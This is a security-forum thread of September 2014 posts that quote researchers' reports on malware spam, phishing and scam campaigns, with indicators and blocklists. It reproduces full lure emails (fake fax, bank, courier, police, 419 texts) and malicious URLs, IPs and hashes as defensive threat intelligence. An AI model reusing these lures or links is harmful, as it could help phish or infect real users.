* https://www.virustot...sis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustot...27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo....w-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From:     Fax
Date:     16 September 2014 11:05
Subject:     You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...


The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps
"
* https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo....oices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is  not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From:     Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date:     16 September 2014 12:17
Subject:     Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...


Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231
..."
(More detail at the dynamoo URL above.)
* https://www.virustot...sis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo....spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
    From:     Christie Foley [christie.foley@ badinsky .sk]
    Reply-to:     Christie Foley [christie.foley@ badinsky .sk]
    Date:     16 September 2014 13:55
    Subject:     Unpaid invoice notification ...


Screenshot: https://1.bp.blogspo...600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/...d=1410873578924

- http://myonlinesecur...xploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email -  419 SCAM
- http://myonlinesecur...ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
    Attn:Beneficiary,
     My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
     Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
    you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
    therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
    authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
    Teller Machine System( ATM CARD).
     Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
     Reply also to : fminister88 @gmail .com
     Your faithfully.
     Dr Mrs Ngozi O. Iweala.
    Finance Of Minister.


[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     We have arranged a BACS transfer to your bank for the following amount : 4933.00
    Please find details at our secure link below: ...


This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/

- https://www.virustot...sis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
198.143.152.226: https://www.virustot...26/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu...ontains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
    We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
    The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
    You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
    If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
    Airway Bill No: 7808130095
    Class: Package Services
    Service(s): Delivery Confirmation
    Status: eNotification sent
    Print this label to get this package at our depot/office.
    Thank you
    © 2014 Copyright© 2013 DHL. All Rights Reserved...


The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1410870424/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 16 September 2014 - 10:48 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1281 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 17 September 2014 - 05:14 AM

FYI...

Fake FAX SPAM - malware
- http://blog.dynamoo....you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
    From:     Fax [fax@ victimdomain .com]
    Date:     17 September 2014 09:32
    Subject:     You've received a new fax
    New fax at SCAN6405035 from EPSON by https ://victimdomain .com
    Scan date: Wed, 17 Sep 2014 16:32:29 +0800
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...
    (Google Disk Drive is a file hosting service operated by Google, Inc.)


The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br
"
* https://www.virustot...sis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/

188.165.204.210: https://www.virustot...10/information/
___

Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecur...ce-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.

Screenshot: http://myonlinesecur...licious-pdf.png

17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410974477/
___

Android Malware uses SSL for Evasion
- http://blog.trendmic...sl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combine the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___

Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...

Screenshot: http://myonlinesecur...ast-invoice.png

17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to:  Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410939664/
___

Fake Invoice SPAM ...
- http://myonlinesecur...ke-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
    Dear Sir,
    Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
    Thank you,
    Darragh


This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecur...ke-pdf-malware/
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 17 September 2014 - 01:10 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1282 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 18 September 2014 - 06:27 AM

FYI...

Fake NatWest SPAM - malware attached
- http://blog.dynamoo....voice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     18 September 2014 11:06
    Subject:     Important - New account invoice
      Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here or follow the link below ...
    Thank you for choosing NatWest...


The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk
"
* https://www.virustot...sis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustot...52/information/
188.165.204.210: https://www.virustot...10/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/

UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
Date:     18 September 2014 11:45
Subject:     Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...


- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecur...unt-invoice.png
___

USAA Phish ...
- https://blog.malware...hing-campaigns/
Sep 18, 2014 - "... phish pages targeting the United Services Automobile Association (USAA), a Fortune 500 financial company that offers banking, investing, and insurance to US Military soldiers and their families. Here is what the fake page looks like:
> https://blog.malware...lt-1024x851.png
... Users are then led to this page:
> https://blog.malware...in-1024x665.png
... Clicking the “Next” button opens this page wherein users can supply their secret questions and their respective answers:
> https://blog.malware...na-1024x789.png
... Clicking “Next” opens the last page, which asks for more information that needs “updating”, including full name and date of birth:
> https://blog.malware...fo-967x1024.png
... Users are then shown the door by redirecting them to the legitimate USAA page one sees when they log out... In case you receive emails claiming to be from USAA, please note that they do -not- send out emails to their clients, or to anyone for that matter, asking for their information. Here is a short list of tips to help you steer clear of USAA phishing attempts:
- Remain aware of phishing cases involving USAA. It’s also good to have their contact details handy in the event of fraud or account compromise.
- The legitimate USAA website, www.usaa.com, is a verified domain. As such, look for the green box beside its URL on the browser address bar. This site also uses SSL encryption, which means that it uses the https protocol, making it safe to access even over public networks.
- Ensure that the anti-phishing feature of your Internet browser is enabled. Do this for your antivirus software as well..."
___

Fake eFax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    INCOMING FAX REPORT
    Date/Time: Thursday, 18.09.2014
    Speed: 353bps
    Connection time: 08:02
    Page: 4
    Resolution: Normal
    Remote ID: 611-748-177946
    Line number: 3
    DTMF/DID:
    Description: Internal only ...


18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Line Voice Message Spam
- http://threattrack.t...ce-message-spam
18 Sep 2014 - "Subjects Seen:
    You have a voice message
Typical e-mail details:
    LINE Notification
    You have a voice message, listen it now.
    Time: 21:12:45 14.10.2014, Duration: 45sec


Malicious URLs:
    iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
    LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
    LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)


Screenshot: https://gs1.wac.edge...Jmds1r6pupn.png

Tagged: Line.me, Kuluoz

147.202.201.24: https://www.virustot...24/information/
___

Chinese hacked U.S. military contractors ...
- http://www.reuters.c...N0HC1TA20140918
Sep 18, 2014 - "Hacks associated with the Chinese government have repeatedly infiltrated the computer systems of U.S. airlines, technology companies and other contractors involved in the movement of U.S. troops and military equipment, a U.S. Senate panel has found. The Senate Armed Services Committee's year-long probe, concluded in March but made public on Wednesday, found the military's U.S. Transportation Command, or Transcom, was aware of only two out of at least -20- such cyber intrusions within a single year. The investigation also found gaps in reporting requirements and a lack of information sharing among U.S. government entities. That in turn left the U.S. military largely unaware of computer compromises of its contractors..."
 

:grrr:  :ph34r: :ph34r:


Edited by AplusWebMaster, 18 September 2014 - 03:02 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1283 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 19 September 2014 - 07:08 AM

FYI...

Fake 'voice mail' SPAM ...
- http://blog.dynamoo....e-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
    From:     Microsoft Outlook [no-reply@ victimdomain .com]
    Date:     19 September 2014 11:59
    Subject:     You have received a voice mail
    You received a voice mail : VOICE976-588-6749.wav (25 KB)
    Caller-Id: 976-588-6749
    Message-Id: D566Y5
    Email-Id: <REDACTED>
    Download and extract to listen the message.
    We have uploaded voicemail report on dropbox, please use the following link to download your file...
    Sent by Microsoft Exchange Server


The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo....-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspo...600/natwest.png

192.185.97.223: https://www.virustot...23/information/

- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecur...t-statement.png
Current Virus total detections: 1/54*
* https://www.virustot...sis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: London City Police
    Sending Location: GB – London – London City Police
    Bulletin Case#: 14-62597
    Bulletin Author: BARILLAS #1169
    Sending User #: 92856
    APBnet Version: 684593
    The bulletin is a pdf attachment to this email.
    The Adobe Reader (from Adobe .com) will display and print the bulletin best.
    You can Not reply to the bulletin by clicking on the Reply button in your email software.


Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to:   Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     TNT COURIER SERVICE (TCS)
    Customer/Delivery Services Department
    Central Pk Est/Mosley Rd, Trafford Park
    Manchester, M17 1TT UK.
    DETAILS OF PACKAGE
    Reg order no: 460911612900
    Your package have been picked up and is ready for dispatch.
    Connote #           :               460911612900
    Service Type      :               Export Non Documents – Intl
    Shipped on         :               18 Sep 14 12:00
    Order No                    :       4240629
    Status          :       Driver’s Return
    Description     :      Wrong Address
    Service Options: You are required to select a service option below.
    The options, together with their associated conditions.
    Please check attachment to view information about the sender and package.


19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.c...N0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu...l?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer.  If you need help, please visit the Apple Support.
Apple Client Support.


A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.../2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn...licious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn...licious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 20 September 2014 - 05:34 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1284 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 22 September 2014 - 06:51 AM

FYI...

Fake gov't SPAM
- http://blog.dynamoo....ssion-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspo...600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustot...sis/1411383282/

 

184.168.152.32: https://www.virustot...32/information/

** https://anubis.isecl...f82&format=html

- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecur...-Submission.png
...
> https://www.virustot...sis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecur...update-malware/
22 Sep 2014"'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Dear client,
    We are pleased to announce that LogMeIn has released a new security certificate.
    It contains new features:
    •    The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
    •    Any irregular activity on your account will be detected by our security department
    •       This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
    Download the attached certificate. Update will be automatically installed by double click.
    As always, your Logmein Support Team is happy to assist with any questions you may have.
    Feel free to contact us ...


22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/

- https://isc.sans.edu...l?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu...11_34_06 AM.png
...
> https://www.virustot...b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustot...05/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecur...ds-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecur...to-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411415107/

- http://threattrack.t...rance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edge...1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecur...es-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
    Thank you.


22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
     Please download your payment advice at ...
     Yours faithfully,
    Global Payments and Cash Management
    This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.


... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued  is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached your Invoice(s)/Credit(s)
    PETER HOGARTH & SONS LTD
    INDUSTRIAL HYGIENE and PROTECTION
    Tel: 01472 345726 | Fax: 01472 250272 | Web...
    Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
    Peter Hogarth & Sons Ltd is a company registered in England.
    Company Registration Number: 1143352...


